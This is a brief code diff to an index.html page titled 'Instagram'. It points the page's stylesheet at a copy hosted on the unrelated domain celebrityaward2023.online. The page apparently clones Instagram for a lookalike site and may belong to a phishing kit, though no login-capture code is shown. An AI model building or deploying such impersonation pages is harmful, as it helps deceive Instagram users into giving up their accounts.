--- a/instagram.com/index.html
+++ b/instagram.com/index.html
@@ -4,7 +4,7 @@
   <meta charset="utf-8">
   <title>Instagram</title>
   <!-- Stylesheet -->
-  <link rel="stylesheet" type="text/css" href="style.css">
+  <link rel="stylesheet" type="text/css" href="https://www.celebrityaward2023.online/instagram.com/style.css">
   <!-- Font awesome -->
   <script src="https://kit.fontawesome.com/4e6b50c3ce.js" crossorigin="anonymous"></script>
 </head>
